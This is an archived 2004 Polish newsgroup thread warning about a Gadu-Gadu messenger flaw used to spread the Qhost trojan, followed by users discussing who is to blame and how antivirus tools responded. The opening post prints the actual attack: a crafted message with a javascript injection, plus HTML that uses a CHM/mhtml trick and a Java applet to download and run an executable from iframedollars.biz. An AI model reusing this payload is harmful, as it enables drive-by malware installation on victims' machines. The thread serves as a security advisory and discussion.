NOWY TEMAT
elektroda NewsGroups Forum Index - Elektronika Polska - Nowe zagrożenie w Gadu-Gadu: Trojan Qhost roznoszony przez wyspecjalizowane wiadomości
JJMafia
Guest
Guest
Thu Dec 23, 2004 2:18 pm
Cztery dni temu informowaliśmy o kolejnych błędach w komunikatorze
Gadu-Gadu. Jeden z nich pozwalał między innymi na wykonanie kodu javascript
w strefie lokalnej poprzez wysłanie odpowiednio spreparowanej wiadomości. W
dniu dzisiejszym w sieci Gadu-Gadu rozsyłana jest wiadomość której odebranie
powoduje instalacje trojana Qhost.
Wiadomość rozsyłana jest z bramki WWW - GG o numerze 7021349. Oto jej treść:
www.po"style=background-image:url(javascript:window.open('http://iframedolla
rs.biz/dl/adv407.php','','left=10000'));".pl
W pliku adv407.php znajduje się kod HTML:
<html><head>
</head><body>
<textarea cd="cxw" style="display:none;" >
<object data="${PR}" type="text/x-scriptlet"></object>
</textarea>
<script language="javascript">
document.write(cxw.value.replace(/\${PR}/g,'ms-its:mhtml:file://c:\\nosuch.m
ht!http://iframedollars.biz/dl/adv407/x.chm::/x.htm'));
</script>
<applet width=1 height=1 ARCHIVE=loaderadv407.jar
code=Counter></APPLET></body></html>
Aplet zapisany w archiwum loaderadv407.jar pobiera program
http://iframedollars.biz/dl/loadadv407.exe i instaluje go na komputerze
ofiary. Loadadv407.exe przez skaner Mks'a identyfikowany jest jako
Trojan.Qhost.
Zalecamy niezwłoczną aktualizacje do najnowszej wersji klienta Gadu-Gadu
bądź skorzystanie z alternatywnych klientów.
orginal: http://hacking.pl/news.php?id=4580
BartMan
Guest
Guest
Thu Dec 23, 2004 3:24 pm
JJMafia napisał(a):
Quote:
Cztery dni temu informowaliśmy o kolejnych błędach w komunikatorze
Gadu-Gadu. Jeden z nich pozwalał między innymi na wykonanie kodu javascript
w strefie lokalnej poprzez wysłanie odpowiednio spreparowanej wiadomości. W
Nie tylko GG,ale takze starsze wersje tlena. W pracy koledzy uzywaja
Gadu-Gadu. Jeden z nich pozwalał między innymi na wykonanie kodu javascript
w strefie lokalnej poprzez wysłanie odpowiednio spreparowanej wiadomości. W
Nie tylko GG,ale takze starsze wersje tlena. W pracy koledzy uzywaja
tlena i na jednej z wersji kod takze zadzialal. Nowsze wersje juz nie
maja buga. Generalnie patent polega na zagniezdzaniu Internet Explorera
wewnatrz okna rozmowy komunikatora. Wszystkie bugi IE beda dzialaly pod
durnymi komunikatorami.
Quote:
dniu dzisiejszym w sieci Gadu-Gadu rozsyłana jest wiadomość której odebranie
powoduje instalacje trojana Qhost.
Odebranie - czytaj: posiadanie wlaczonego GG - to sie odbiera samo. Ja
powoduje instalacje trojana Qhost.
Odebranie - czytaj: posiadanie wlaczonego GG - to sie odbiera samo. Ja
tez mialem kilka dni temu, ale mam tez program antywirusowy, ktory to
powstrzymal!
Quote:
Zalecamy niezwłoczną aktualizacje do najnowszej wersji klienta Gadu-Gadu
bądź skorzystanie z alternatywnych klientów.
Sam uzywam GG, ale to _smiec_ nie komunikator, powala mnie ignorancja
bądź skorzystanie z alternatywnych klientów.
Sam uzywam GG, ale to _smiec_ nie komunikator, powala mnie ignorancja
firmy, ktora go wymyslila. Ma wiecej bledow niz wszystkie wersje
windowsa razem. Nawet monitowanie o poprawki nic nie daje. Sukces polega
tylko na momencie wejscia na rynek, kiedy nie bylo innych rozwiazan -
reszta sama sie toczy.
Jak juz sie w koncu obrobie z praca to przerzucam sie na cos innego.
Pozdrawiam,
BartMan
BartMan
Guest
Guest
Thu Dec 23, 2004 5:15 pm
J.F. napisał(a):
Quote:
A w ogole to kto tu bardziej zawinil ?
GG, czy MSIE .. ktorego podejrzewam ze GG wykorzystuje ?
GG, bo teraz juz nie ma tej dziury w GG jak pisze mr JJMafia. Jak
GG, czy MSIE .. ktorego podejrzewam ze GG wykorzystuje ?
GG, bo teraz juz nie ma tej dziury w GG jak pisze mr JJMafia. Jak
pisalem, GG to na prawde kiepsko napisany program.
Quote:
A moze MS VM javy ?
Nie, bo mowa o JS - JavaScripcie - to jest jezyk skryptowy z obsluga
Nie, bo mowa o JS - JavaScripcie - to jest jezyk skryptowy z obsluga
wbudowana w kazda przegladarke, nie ma nic wspolnego z Java VM procz
podobnej skladni do Javy no i nazwy... Niestety jezyki czesto mylone :/
Quote:
MS przestal dostarczac, supportowac i popierac Jave, zwraca obecnie
uwage ze za bezpieczenstwo Sun VM nie odpowiada.
IMHO - ActiveX okaza sie jeszcze bardziej dziurawe
Potwornie. Mozesz ze swojego skryptu na stronie www wysunac tacke cdromu
uwage ze za bezpieczenstwo Sun VM nie odpowiada.
IMHO - ActiveX okaza sie jeszcze bardziej dziurawe
Potwornie. Mozesz ze swojego skryptu na stronie www wysunac tacke cdromu
osoby ktora ta strone odwiedza. Przeciez to ingerencja w hardware, ktore
powinno byc chronione. Sporo wirusow sie na tym opiera.
BartMan
RoMan Mandziejewicz
Guest
Guest
Thu Dec 23, 2004 6:05 pm
Hello J,
Thursday, December 23, 2004, 5:45:57 PM, you wrote:
[...]
Quote:
MS przestal dostarczac, supportowac i popierac Jave, zwraca obecnie
uwage ze za bezpieczenstwo Sun VM nie odpowiada.
uwage ze za bezpieczenstwo Sun VM nie odpowiada.
Jasssne... Przestał wspierać itd. po awanturze z Sunem o przekroczenie
zasad licencji.
[...]
--
Best regards,
RoMan mailto:roman@pik-net.pl
Krzys-iek
Guest
Guest
Thu Dec 23, 2004 6:31 pm
Quote:
A w ogole to kto tu bardziej zawinil ?
pan od GG mocno, jakos to naprawili teraz :-)
Quote:
GG, czy MSIE .. ktorego podejrzewam ze GG wykorzystuje ?
GG jedzie na gotowych komponentach IE to pewne. Ale ataki JS injection i tak
malo grozne o ile ma sie polatanego IE, a jak sie nie ma to i tak czy to
droga GG czy poprzez lazanie po x x x sie dorwie 'zonka'.
P.s
GG zajmuje u mnie ok 30MB, miranda ma zajmowac ok 6MB z pluginem GG. Co
pokazuje jak 'dobrze' jest GG napisane...
Wywalenie reklam zgodnie z regulaminem to lamanie umowy licencyjnej(czy
jakiej tam), no ok a jak chce miec lepszego klienta niz ten oryginalny? Np
taka miranda, a to sie okazuje ze tez niezgodne z regulaminem GG... pat albo
lamiesz jakis punkt umowy z GG
neuron
Guest
Guest
Thu Dec 23, 2004 7:47 pm
Quote:
Przestal w ogole.
Jeszcze tylko wyplacze sie z javascriptow i bedzie po javie :-)
juz zaprzestaje ostatnio przegladarka ciagle mnie pyta czy bym
Jeszcze tylko wyplacze sie z javascriptow i bedzie po javie :-)
juz zaprzestaje
ostatnio przegladarka ciagle mnie pyta czy bymvisualbasica nie chcial doinstalowac :>
wojtek
www.neuron.com.pl
VSS
Guest
Guest
Thu Dec 23, 2004 8:07 pm
Dostałem tego smiecia w spod tego numeru GG ale na moje pytanie "co to ?"
nie dostałem odpowiedzi, przezornie olałem klikanie w tego linka
--
VSS http://vss.lasershow.pl
Światło i dźwięk http://www.lasershow.pl
Wojtek Kaniewski
Guest
Guest
Thu Dec 23, 2004 8:09 pm
BartMan wrote:
Quote:
(...) Generalnie patent polega na zagniezdzaniu Internet Explorera
wewnatrz okna rozmowy komunikatora. Wszystkie bugi IE beda dzialaly pod
durnymi komunikatorami.
wewnatrz okna rozmowy komunikatora. Wszystkie bugi IE beda dzialaly pod
durnymi komunikatorami.
ten błąd to akurat błąd w GG, bo źle zamienia otrzymają wiadomość na
HTML. IE tylko posłusznie wykonuje to, co ma robić.
w.
BartMan
Guest
Guest
Thu Dec 23, 2004 8:17 pm
J.F. napisał(a):
Quote:
Ale tu widzialem jakiegos jar sciaganego .. reszte robila juz chyba
VM.
Racja racja, bo to kwestia kodu wirusa, ale bug jest w IE i kod wykonuje
VM.
Racja racja, bo to kwestia kodu wirusa, ale bug jest w IE i kod wykonuje
sie w JS. Natomiast co sie sciagnie i uruchomi to juz wszystko jedno.
Bug pozwala sciagnac i uruchomic "cos" z netu. Mozesz ludziom Flasha
wyslac z zyczeniami...
BartMan
BartMan
Guest
Guest
Thu Dec 23, 2004 8:19 pm
Krzys-iek <root.a.krionix.ten napisał(a):
Quote:
P.s
GG zajmuje u mnie ok 30MB, miranda ma zajmowac ok 6MB z pluginem GG. Co
pokazuje jak 'dobrze' jest GG napisane...
W asemblerze to toto nie jest napisane
Wywalenie reklam zgodnie z regulaminem to lamanie umowy licencyjnej(czy
jakiej tam), no ok a jak chce miec lepszego klienta niz ten oryginalny? Np
taka miranda, a to sie okazuje ze tez niezgodne z regulaminem GG... pat albo
lamiesz jakis punkt umowy z GG
Ja nie usunalem reklam z GG tylko w pliku hosts (pod winda)
GG zajmuje u mnie ok 30MB, miranda ma zajmowac ok 6MB z pluginem GG. Co
pokazuje jak 'dobrze' jest GG napisane...
W asemblerze to toto nie jest napisane
Wywalenie reklam zgodnie z regulaminem to lamanie umowy licencyjnej(czy
jakiej tam), no ok a jak chce miec lepszego klienta niz ten oryginalny? Np
taka miranda, a to sie okazuje ze tez niezgodne z regulaminem GG... pat albo
lamiesz jakis punkt umowy z GG
Ja nie usunalem reklam z GG tylko w pliku hosts (pod winda)
dopisalem adserver.gadu-gadu.pl jako wlasny ip i mi sie reklami nie
sciagaja
BartMa
J.F.
Guest
Guest
Thu Dec 23, 2004 8:32 pm
On Thu, 23 Dec 2004 21:17:35 +0100, BartMan wrote:
Quote:
J.F. napisał(a):
Ale tu widzialem jakiegos jar sciaganego .. reszte robila juz chyba
VM.
Racja racja, bo to kwestia kodu wirusa, ale bug jest w IE i kod wykonuje
sie w JS. Natomiast co sie sciagnie i uruchomi to juz wszystko jedno.
Ale tu widzialem jakiegos jar sciaganego .. reszte robila juz chyba
VM.
Racja racja, bo to kwestia kodu wirusa, ale bug jest w IE i kod wykonuje
sie w JS. Natomiast co sie sciagnie i uruchomi to juz wszystko jedno.
Ale JM nie powinna pozwolic na "niebezpieczne" operacje ..
przynajmniej w kontekscie "przegladarka internetowa".
Quote:
Bug pozwala sciagnac i uruchomic "cos" z netu. Mozesz ludziom Flasha
wyslac z zyczeniami...
wyslac z zyczeniami...
No tak - powinien pytac.
J.
BYRRT!
Guest
Guest
Fri Dec 24, 2004 12:55 am
przedewszystkim to ta wiadomosc jest zararzona
BYRRT!
Guest
Guest
Fri Dec 24, 2004 12:57 am
Quote:
Dostałem tego smiecia w spod tego numeru GG ale na moje pytanie "co to ?"
nie dostałem odpowiedzi, przezornie olałem klikanie w tego linka
--
Czy tylko ja mam OE i NAV i tylko ja przy probie otworzenia glownej
nie dostałem odpowiedzi, przezornie olałem klikanie w tego linka
--
Czy tylko ja mam OE i NAV i tylko ja przy probie otworzenia glownej
wiadomosci mam zglaszany komunikat ze w wiadomosci jest zlosliwy kod??
BartMan
Guest
Guest
Fri Dec 24, 2004 9:51 am
BYRRT! napisał(a):
Quote:
Dostałem tego smiecia w spod tego numeru GG ale na moje pytanie "co to ?"
nie dostałem odpowiedzi, przezornie olałem klikanie w tego linka
--
Czy tylko ja mam OE i NAV i tylko ja przy probie otworzenia glownej
wiadomosci mam zglaszany komunikat ze w wiadomosci jest zlosliwy kod??
To jest wirus, wirus sie sam otwiera z tego linku przez JavaScripta (nie
nie dostałem odpowiedzi, przezornie olałem klikanie w tego linka
--
Czy tylko ja mam OE i NAV i tylko ja przy probie otworzenia glownej
wiadomosci mam zglaszany komunikat ze w wiadomosci jest zlosliwy kod??
To jest wirus, wirus sie sam otwiera z tego linku przez JavaScripta (nie
jave!). Ja tez mam NAV i on mnie uratowal, bo kod sie nie wykonal.
BartMan
BartMan
Guest
Guest
Fri Dec 24, 2004 9:52 am
VSS napisał(a):
Quote:
Dostałem tego smiecia w spod tego numeru GG ale na moje pytanie "co to ?"
nie dostałem odpowiedzi, przezornie olałem klikanie w tego linka
nie dostałem odpowiedzi, przezornie olałem klikanie w tego linka
Bo masz albo nowe GG albo inny komunikator - jesli Ci sie nie
uruchomilo, to nie masz juz BUG'a. Powinno sie samo uruchomic.
Moge wyjasnic jak to dziala, ale moze pozniej, bo szykuje Wigilie. :)
BartMan
elektroda NewsGroups Forum Index - Elektronika Polska - Nowe zagrożenie w Gadu-Gadu: Trojan Qhost roznoszony przez wyspecjalizowane wiadomości